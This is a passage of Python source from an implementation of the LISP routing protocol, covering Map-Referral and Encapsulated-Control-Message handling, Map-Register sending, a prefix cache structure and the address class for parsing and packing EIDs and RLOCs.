referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
# that wasn't in packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (addr_str not in referral.referral_set):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (addr_str in dirty_set): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (s in referral.referral_set):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authenticaiton for Map-Register message and sent to supplied
# Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
# a Map-Server, we can't join the group by using the group so we have to
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
# Should we encrypt the Map-Register? Use 16-byte key which is
# 32 string characters. Use 20 rounds so the decrypter can interoperate
# with ct-lisp mobile platforms.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv, 20).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send LISP control packet that is to be source from UDP port 4342 to the
# lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
# For sending Map-Requests, if the NAT-traversal configured, use same
# socket used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associatative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
class lisp_cache_entries(object):
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache(object):
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
ml = 0
elif (prefix.afi == LISP_AFI_IID_RANGE):
ml = prefix.mask_len
else:
ml = prefix.mask_len + 48
#endif
iid = lisp_hex_string(prefix.instance_id).zfill(8)
afi = lisp_hex_string(prefix.afi).zfill(4)
if (prefix.afi > 0):
if (prefix.is_binary()):
length = prefix.addr_length() * 2
addr = lisp_hex_string(prefix.address).zfill(length)
else:
addr = prefix.address
#endif
elif (prefix.afi == LISP_AFI_GEO_COORD):
afi = "8003"
addr = prefix.address.print_geo()
else:
afi = ""
addr = ""
#endif
key = iid + afi + addr
return([ml, key])
#enddef
def add_cache(self, prefix, entry):
if (prefix.is_binary()): prefix.zero_host_bits()
ml, key = self.build_key(prefix)
if (ml not in self.cache):
self.cache[ml] = lisp_cache_entries()
self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
#endif
if (key not in self.cache[ml].entries):
self.cache_count += 1
#endif
self.cache[ml].entries[key] = entry
#enddef
def lookup_cache(self, prefix, exact):
ml_key, key = self.build_key(prefix)
if (exact):
if (ml_key not in self.cache): return(None)
if (key not in self.cache[ml_key].entries): return(None)
return(self.cache[ml_key].entries[key])
#endif
found = None
for ml in self.cache_sorted:
if (ml_key < ml): return(found)
for entry in list(self.cache[ml].entries.values()):
if (prefix.is_more_specific(entry.eid)):
if (found == None or
entry.eid.is_more_specific(found.eid)): found = entry
#endif
#endfor
#endfor
return(found)
#enddef
def delete_cache(self, prefix):
ml, key = self.build_key(prefix)
if (ml not in self.cache): return
if (key not in self.cache[ml].entries): return
self.cache[ml].entries.pop(key)
self.cache_count -= 1
#enddef
def walk_cache(self, function, parms):
for ml in self.cache_sorted:
for entry in list(self.cache[ml].entries.values()):
status, parms = function(entry, parms)
if (status == False): return(parms)
#endfor
#endfor
return(parms)
#enddef
def sort_in_entry(self, table, value):
if (table == []): return([value])
t = table
while (True):
if (len(t) == 1):
if (value == t[0]): return(table)
index = table.index(t[0])
if (value < t[0]):
return(table[0:index] + [value] + table[index::])
#endif
if (value > t[0]):
return(table[0:index+1] + [value] + table[index+1::])
#endif
#endif
index = old_div(len(t), 2)
t = t[0:index] if (value < t[index]) else t[index::]
#endwhile
return([])
#enddef
def print_cache(self):
lprint("Printing contents of {}: ".format(self))
if (self.cache_size() == 0):
lprint(" Cache is empty")
return
#endif
for ml in self.cache_sorted:
for key in self.cache[ml].entries:
entry = self.cache[ml].entries[key]
lprint(" Mask-length: {}, key: {}, entry: {}".format(ml, key,
entry))
#endfor
#endfor
#enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
multicast = dest.is_multicast_address()
#
# Look up destination in map-cache.
#
mc = lisp_map_cache.lookup_cache(dest, False)
if (mc == None):
eid_str = source.print_sg(dest) if multicast else dest.print_address()
eid_str = green(eid_str, False)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Unicast lookup succeeded.
#
if (multicast == False):
m = green(mc.eid.print_prefix(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(dest.print_address(), False), m))
return(mc)
#endif
#
# If destination is multicast, then do source lookup.
#
mc = mc.lookup_source_cache(source, False)
if (mc == None):
eid_str = source.print_sg(dest)
dprint("Lookup for EID {} not found in map-cache".format(eid_str))
return(None)
#endif
#
# Multicast lookup succeeded.
#
m = green(mc.print_eid_tuple(), False)
dprint("Lookup for EID {} found map-cache entry {}".format( \
green(source.print_sg(dest), False), m))
return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
if (group and group.is_null()):
ref = lisp_referral_cache.lookup_cache(eid, exact)
return(ref)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid == None or eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ref = lisp_referral_cache.lookup_cache(group, exact)
if (ref == None): return(None)
sref = ref.lookup_source_cache(eid, exact)
if (sref): return(sref)
if (exact): ref = None
return(ref)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
if (group.is_null()):
ddt = lisp_ddt_cache.lookup_cache(eid, exact)
return(ddt)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
ddt = lisp_ddt_cache.lookup_cache(group, exact)
if (ddt == None): return(None)
sddt = ddt.lookup_source_cache(eid, exact)
if (sddt): return(sddt)
if (exact): ddt = None
return(ddt)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
if (group.is_null()):
site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
return(site_eid)
#endif
#
# No source to do 2-stage lookup, return None.
#
if (eid.is_null()): return(None)
#
# Do 2-stage lookup, first on group and within its structure for source.
# If we found both entries, return source entry. If we didn't find source
# entry, then return group entry if longest match requested.
#
site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
if (site_eid == None): return(None)
#
# There is a special case we have to deal with here. If there exists a
# (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
# more-specifics, this entry will not be retunred if there is a more-
# specific already cached. For instance, if a Map-Register was received
# for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
# 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
# a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
# matching the ams entry, it will match the more specific entry and return
# (*, 224.1.1.1/32). Since the source lookup will be performed below and
# not find 2.2.2.2, what is retunred is 224.1.1.1/32 and not 224.0.0.0/4.
#
# So we will look at the retunred entry and if a source is not found, we
# will check to see if the parent of the 224.1.1.1/32 matches the group
# we are looking up. This, of course, is only done for longest match
# lookups.
#
seid = site_eid.lookup_source_cache(eid, exact)
if (seid): return(seid)
if (exact):
site_eid = None
else:
parent = site_eid.parent_for_more_specifics
if (parent and parent.accept_more_specifics):
if (group.is_more_specific(parent.group)): site_eid = parent
#endif
#endif
return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python parcularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address(object):
def __init__(self, afi, addr_str, mask_len, iid):
self.afi = afi
self.mask_len = mask_len
self.instance_id = iid
self.iid_list = []
self.address = 0
if (addr_str != ""): self.store_address(addr_str)
#enddef
def copy_address(self, addr):
if (addr == None): return
self.afi = addr.afi
self.address = addr.address
self.mask_len = addr.mask_len
self.instance_id = addr.instance_id
self.iid_list = addr.iid_list
#enddef
def make_default_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
self.mask_len = 0
self.address = 0
#enddef
def make_default_multicast_route(self, addr):
self.afi = addr.afi
self.instance_id = addr.instance_id
if (self.afi == LISP_AFI_IPV4):
self.address = 0xe0000000
self.mask_len = 4
#endif
if (self.afi == LISP_AFI_IPV6):
self.address = 0xff << 120
self.mask_len = 8
#endif
if (self.afi == LISP_AFI_MAC):
self.address = 0xffffffffffff
self.mask_len = 48
#endif
#enddef
def not_set(self):
return(self.afi == LISP_AFI_NONE)
#enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
def is_multicast_address(self):
if (self.is_ipv4()): return(self.is_ipv4_multicast())
if (self.is_ipv6()): return(self.is_ipv6_multicast())
if (self.is_mac()): return(self.is_mac_multicast())
return(False)
#enddef
def host_mask_len(self):
if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()) * 8)
#endif
return(0)
#enddef
def is_iana_eid(self):
if (self.is_ipv6() == False): return(False)
addr = self.address >> 96
return(addr == 0x20010005)
#enddef
def addr_length(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(16)
if (self.afi == LISP_AFI_MAC): return(6)
if (self.afi == LISP_AFI_E164): return(8)
if (self.afi == LISP_AFI_LCAF): return(0)
if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
if (self.afi == LISP_AFI_IID_RANGE): return(4)
if (self.afi == LISP_AFI_GEO_COORD):
return(len(self.address.print_geo()))
#endif
return(0)
#enddef
def afi_to_version(self):
if (self.afi == LISP_AFI_IPV4): return(4)
if (self.afi == LISP_AFI_IPV6): return(6)
return(0)
#enddef
def packet_format(self):
#
# Note that "I" is used to produce 4 bytes because when "L" is used,
# it was producing 8 bytes in struct.pack().
#
if (self.afi == LISP_AFI_IPV4): return("I")
if (self.afi == LISP_AFI_IPV6): return("QQ")
if (self.afi == LISP_AFI_MAC): return("HHH")
if (self.afi == LISP_AFI_E164): return("II")
if (self.afi == LISP_AFI_LCAF): return("I")
return("")
#enddef
def pack_address(self):
packet_format = self.packet_format()
packet = b""
if (self.is_ipv4()):
packet = struct.pack(packet_format, socket.htonl(self.address))
elif (self.is_ipv6()):
addr1 = byte_swap_64(self.address >> 64)
addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_mac()):
addr = self.address
addr1 = (addr >> 32) & 0xffff
addr2 = (addr >> 16) & 0xffff
addr3 = addr & 0xffff
packet = struct.pack(packet_format, addr1, addr2, addr3)
elif (self.is_e164()):
addr = self.address
addr1 = (addr >> 32) & 0xffffffff
addr2 = (addr & 0xffffffff)
packet = struct.pack(packet_format, addr1, addr2)
elif (self.is_dist_name()):
packet += (self.address + "\0").encode()
#endif
return(packet)
#enddef
def unpack_address(self, packet):
packet_format = self.packet_format()
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
